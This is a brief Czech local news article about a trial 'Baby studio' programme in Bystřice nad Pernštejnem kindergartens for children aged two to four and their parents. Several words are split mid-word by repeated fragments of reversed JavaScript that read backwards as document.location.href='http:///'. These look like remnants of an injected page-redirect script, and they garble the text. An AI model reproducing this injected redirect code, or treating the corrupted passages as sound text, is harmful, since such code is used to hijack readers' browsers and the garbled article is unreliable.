Bystřice nad Pernštejnem, bystrice nad pernstejnem, aktuality, školka, pobyt, Baby, studio
Rainbow page separator

Školka nachystala pro nejmenší pobyt na zkoušku

Pondělí, 11. března 2013

deti-kopretinaBystřice nad Pernštejnem / Takzvané Baby studio v bystřických mateřských školkách v Nádražní, Okružní i Zahradní ulici začalo opět fungovat, potrvá do června. Program je určen převážně rodičům s dětmi ve věku od dvou do čtyř let, kteří uvažují o přihlášení svého po[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomka do školky.

V praxi si tak mohou vyzkoušet, jak jejich dítko na prostředí, personál a běžné činnosti konané ve školce reaguje, zda je v kolektivu pasivní, nebo aktivní, straní se ostatních dětí, anebo je naopak mezi svými vrstevníky spokojené. Rodiče následně mohou zvážit, zda už je jeho zařazení do kolektivu možné, anebo je lépe ještě počkat, pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tože na vstup do školky dítě není dostatečně zralé – při jejich rozhodování i pochybách jim mohou být radou i zkušenostmi nápomocny pří[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomné učitelky.

Baby studio se v mateřských školkách uskutečňuje v pondělí od 14.30 do 15.30 hodin, přesné termíny jsou k doptání v jednotlivých zařízeních.